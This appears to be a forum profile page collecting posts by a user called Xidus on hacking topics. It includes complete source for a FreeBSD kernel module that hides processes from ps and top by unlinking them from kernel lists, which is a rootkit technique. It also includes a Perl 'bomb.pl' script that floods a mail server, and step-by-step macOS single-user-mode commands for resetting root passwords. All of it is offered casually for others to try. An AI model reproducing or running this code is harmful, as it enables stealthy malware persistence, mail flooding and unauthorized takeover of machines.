Xidus

  1. I carry a few paper clips, a rubber band, a straw, a roll of duct tape and a Swiss Army knife. That's right, I am MacGyver
  2. From reading his post I believe he took a Cat 5 cable, cut both the RJ45 connectors off, did the same with the USB cable and soldered the USB connectors to the Cat 5 cable, meaning it wasn't really a Cat 5 cable, just a large USB cable
  3. Er.. Wrapping a phone in Cat 5 will make a phone... wrapped in Cat 5 cable, nothing else. I can think of so many reasons why that wouldn't work
  4. It's a pretty standard way of grouping blocks but hey, maybe I should pick up a copy, sounds like we have the same ideas XD
  5. Not really, flicked through it at a bookstore once, seem to remember it had interesting ideas on detecting hidden kernel modules and writing to kernel land memory..
  6. nmap -sP 192.168.0.* (or whatever your whatchamacallit may be)
  7. If you had way too much time, a vacuum pump of some kind, some carbon fibre and epoxy, you could make your own parabolic antenna....
  8. In theory the OS doesn't even really know that the process is running
  9. I don't have a VM with BSD on it right now, but thinking how ps works I believe that the way I have removed the process from all structures ps queries to display a process... Er I think that means, yes it will hide it from ps -auxf
  10. Nope, neither will top or a few other methods :) (Not sure if it will totally make it invisible from an experienced user)
  11. In theory you could also do this with a simple Perl script if you were on nix and wanted to save some resources.. Don't really have time to write a client to do it now but yeah.. could be done. Maybe I do have time ;)

          #!/usr/bin/perl
          # bomb.pl -- Simple perl script to send a provided message 100 times to the local mail server
          # Xidus
          use strict;
          use IO::Socket;

          my $sock = new IO::Socket::INET(PeerAddr => 'localhost',
                                          PeerPort => '25',
                                          Proto    => 'tcp') or die "mooot";
          my $message = "helo\nMAIL FROM: youremailaddress\@email.com\nRCPT TO: someone\@someone.com\nSUBJECT: mail test\nDATA\nAt least i have chicken\n.";
          for (my $i=0;$i<100;$i++)
          {
              print $sock $message or die "ching";
          }
          close($sock);

          coyote:~/Desktop# time perl bomb.pl

          real 0m0.096s
          user 0m0.064s
          sys 0m0.032s
  12. Or you can just change and/or dump the passwords in the sameish way. Hold down Apple + S during reboot until you enter single user mode, then type /sbin/fsck -y then /sbin/mount -uw / and finally /sbin/SystemStarter theeen passwd root or passwd [name of the main account] :D I have found this seems to work on OS X systems before 1.0.4 (or whatever) Have fun :)
  13. No one probably cares, but I thought I would point out that if a process is hidden and then for some reason is forced to exit, kernel memory will most probably be corrupted... The kernel will run through lists looking for the process and because it won't find the process it will run into, well... problems. To fix this it would be clever to hook either the exit function or provide some measure to find out if a process removed is about to die/be killed and add it to the lists again... whatever :)
  14. So, I was on the plane today for a few hours and got bored, and for some reason I had printed copies of a few kernel source files for FreeBSD and I thought I would whip up something a little fun. This little kernel module loads a system call into the system that will allow the user to hide processes. Now just a warning: I haven't actually run this code, but I believe that it will compile perfectly, and I'm pretty sure that it covers all the bases hiding-processes-wise, but just to be sure, do not actually try to hide processes with this code from someone who knows what they are doing ;)

          #include <sys/types.h>
          #include <sys/param.h>
          #include <sys/proc.h>
          #include <sys/module.h>
          #include <sys/sysent.h>
          #include <sys/kernel.h>
          #include <sys/systm.h>
          #include <sys/queue.h>
          #include <sys/lock.h>
          #include <sys/sx.h>
          #include <sys/mutex.h>

          struct proc_hiding_args {
              pid_t p_pid;
          };

          static int
          proc_hiding(struct thread *td, void *syscall_args)
          {
              struct proc_hiding_args *uap;
              uap = (struct proc_hiding_args *)syscall_args;
              struct proc *p;

              sx_xlock(&allproc_lock);
              sx_xlock(&proctree_lock);
              LIST_FOREACH(p, PIDHASH(uap->p_pid), p_hash)
                  if (uap->p_pid == p->p_pid) {
                      if (p->p_state == PRS_NEW) {
                          p = NULL;
                          break;
                      }
                      PROC_LOCK(p);
                      LIST_REMOVE(p, p_hash);
                      LIST_REMOVE(p, p_list);
                      LIST_REMOVE(p, p_sibling);
                      leavepgrp(p);
                      nprocs--;
                      PROC_UNLOCK(p);
                      break;
                  }
              sx_xunlock(&allproc_lock);
              sx_xunlock(&proctree_lock);
              return(0);
          }

          static struct sysent proc_hiding_sysent = {
              1,
              proc_hiding
          };

          static int offset = NO_SYSCALL;

          static int
          load(struct module *module, int cmd, void*arg)
          {
              int error = 0;

              switch (cmd) {
              case MOD_LOAD:
                  uprintf("Loaded System call at offset %d", offset);
                  break;
              case MOD_UNLOAD:
                  uprintf("Unloaded System call at offset %d", offset);
                  break;
              default:
                  error = EOPNOTSUPP;
              }
              return (error);
          }

          SYSCALL_MODULE(proc_hiding, &offset, &proc_hiding_sysent, load, NULL);

      Meh, have fun, if you see a problem then post it ;)
  15. Xidus

    C2k Hack

    Damn straight it would!